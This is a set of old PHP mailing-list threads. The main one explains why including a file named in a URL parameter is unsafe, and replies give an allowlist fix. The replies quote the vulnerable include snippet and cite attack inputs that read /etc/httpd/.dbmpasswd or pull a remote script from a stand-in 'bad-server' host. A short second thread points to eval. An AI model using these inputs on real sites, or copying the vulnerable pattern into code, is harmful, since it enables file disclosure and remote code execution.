Re: [PHP] Dynamic PHP links

2005-02-14 Thread Richard Lynch
Eduard Grigoryan wrote:
> Hi,
>
> I'm new to PHP and I'd appreciate your advice a lot.
> I'm trying to use dynamic PHP links instead of plain HTML and I'm gonna
> use something like this:
> File index.php:
> ?>
> <a href="index.php?content=story.htm">story</a><br>
> <a href="index.php?content=about.htm">about</a><br>
> <?
> if(isset($content)):
> include $content;
> else:
> include "about.htm";
> endif;
> ?>
>
> But a guy told me it is not preferable to use this method because of
> security considerations.
> I'm sure there is a common way of building dynamic links; am I on the wrong
> way?

Now that you (hopefully) understand the problem, here's a solution for
THIS case:

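<?php
// $content is the ?content= value from the URL, as in the original post.
if (!isset($content)) $content = 'about.htm';
switch($content){
  case 'about.htm':
  case 'story.htm':
    // Only the names listed above ever reach include.
    include $content;
    break;
  default:
    die("Page not found");
    break;
}
?>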

You'll need to add one line for each page, but you will never accidentally
try to include a file you didn't mean to include.


-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[PHP] Dynamic PHP links

2005-02-13 Thread Eduard Grigoryan
Hi,

I'm new to PHP and I'd appreciate your advice a lot.
I'm trying to use dynamic PHP links instead of plain HTML and I'm gonna use
something like this:
File index.php:
?>
<a href="index.php?content=story.htm">story</a><br>
<a href="index.php?content=about.htm">about</a><br>
<?
if(isset($content)):
include $content;
else:
include "about.htm";
endif;
?>

But a guy told me it is not preferable to use this method because of security
considerations.
I'm sure there is a common way of building dynamic links; am I on the wrong way?

Any help would be appreciated.

Thank you in advance



Best regards,
Eduard Grigoryan

*
Armenian Freenet Catalog
http://freenet.am/~edik_g
http://armfn.net/~edik_g




Re: [PHP] Dynamic PHP links

2005-02-13 Thread Ryan A
Hey,

The reason your pal warned you against that approach is, someone could screw
with your url with something like this:

index.php?content=/etc/httpd/.dbmpasswd

which would include that file if it exists... it's a security problem, be
careful and know EXACTLY what you are including/requiring.

-Ryan

On 2/12/2005 10:33:10 AM, Eduard Grigoryan ([EMAIL PROTECTED]) wrote:
> Hi,
>
> I'm new to PHP and I'd appreciate your advice a lot.
> I'm trying to use dynamic PHP links instead of plain HTML and I'm gonna
> use something like this:
> File index.php:
> ?>
> <a href="index.php?content=story.htm">story</a><br>
> <a href="index.php?content=about.htm">about</a><br>
> <?
> if(isset($content)):
> include $content;
> else:
> include "about.htm";
> endif;
> ?>
>
> But a guy told me it is not preferable to use this method because of
> security considerations.
> I'm sure there is a common way of building dynamic links; am I on the wrong
> way?
>
> Any help would be appreciated.
>
> Thank you in advance
>
> Best regards,
> Eduard Grigoryan
>
> *
> Armenian Freenet Catalog
> http://freenet.am/~edik_g
> http://armfn.net/~edik_g




Re: [PHP] Dynamic PHP links

2005-02-13 Thread Burhan Khalid
Eduard Grigoryan wrote:
> Hi,
> I'm new to PHP and I'd appreciate your advice a lot.
> I'm trying to use dynamic PHP links instead of plain HTML and I'm gonna use
> something like this:
> File index.php:
> ?>
> <a href="index.php?content=story.htm">story</a><br>
> <a href="index.php?content=about.htm">about</a><br>
> <?
> if(isset($content)):
> include $content;
> else:
> include "about.htm";
> endif;
> ?>
> But a guy told me it is not preferable to use this method because of security
> considerations.
> I'm sure there is a common way of building dynamic links; am I on the wrong way?

You can search the list archives for posts regarding this topic (it
comes up a lot).

There are safer ways to do what you are doing.  One simple way to hack
your script as written above would be to type:

index.php?content=../some/secret/file.txt
or,
index.php?content=http://www.bad-server.com/badscript.php
in the browser's address bar.

Regards,
Burhan
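
The allowlist idea from Richard Lynch's reply, run against the request values quoted in Ryan A's and Burhan Khalid's replies, as an added example that is not part of the thread. resolve_page(), PAGES and the temporary pages directory are assumed names, and the value is passed in explicitly (as `$_GET['content']` would be) instead of relying on `$content` being set from the URL.

```php
<?php
// Added example, not code from the thread. resolve_page(), PAGES and the
// temporary pages directory are hypothetical names chosen for illustration.

const PAGES = [                 // request value => file inside the pages directory
    'about.htm' => 'about.htm',
    'story.htm' => 'story.htm',
];

/** Return the absolute path to include, or null when the request is refused. */
function resolve_page($requested, array $pages, string $baseDir): ?string
{
    if ($requested === null) {
        $requested = 'about.htm';           // no parameter: default page
    }
    // Refuse arrays (?content[]=x) and anything that is not an exact map key.
    if (!is_string($requested) || !array_key_exists($requested, $pages)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $pages[$requested]);
    // Defence in depth: the resolved file must exist and stay inside $baseDir,
    // which catches a symlink or a careless entry added to the map later.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed test bed: a throwaway pages directory holding the two real pages.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . getmypid();
@mkdir($dir);
file_put_contents("$dir/about.htm", 'about');
file_put_contents("$dir/story.htm", 'story');

// null stands for a request without ?content=; the rest are the values
// that appear in the question and in the replies.
$samples = [null, 'story.htm', '/etc/httpd/.dbmpasswd',
            '../some/secret/file.txt', 'http://www.bad-server.com/badscript.php'];
foreach ($samples as $value) {
    $page = resolve_page($value, PAGES, $dir);
    // index.php would do: if ($page === null) { http_response_code(404);
    // exit('Page not found'); } include $page;
    printf("%-45s %s\n", var_export($value, true),
           $page === null ? 'refused' : 'include ' . basename($page));
}
array_map('unlink', glob("$dir/*")); rmdir($dir);   // remove the test bed
```

The first two values resolve to about.htm and story.htm and the other three are refused before include is reached. Independently of this check, the php.ini setting allow_url_include (off by default since PHP 5.2) controls whether include accepts a URL at all.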


[PHP] Dynamic PHP

2001-12-05 Thread Chris Hemmings

Hello!

I'm sure I read this somewhere but I'm just not so sure now.  Can you
produce PHP code in a PHP page and then run it?  Kind of like this:

<?php
$mycode="echo'Hello';";

# Something here to execute $mycode
?>

Is the above possible??

Thanks!

Chris.




-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]




Re: [PHP] Dynamic PHP

2001-12-05 Thread Pavel Jartsev

Chris Hemmings wrote:

> Hello!
>
> I'm sure I read this somewhere but I'm just not so sure now.  Can you
> produce PHP code in a PHP page and then run it?  Kind of like this:
>
> <?php
> $mycode="echo'Hello';";
>
> # Something here to execute $mycode
> ?>
 

Maybe you need this function:

http://www.php.net/manual/en/function.eval.php

-- 
Pavel a.k.a. Papi

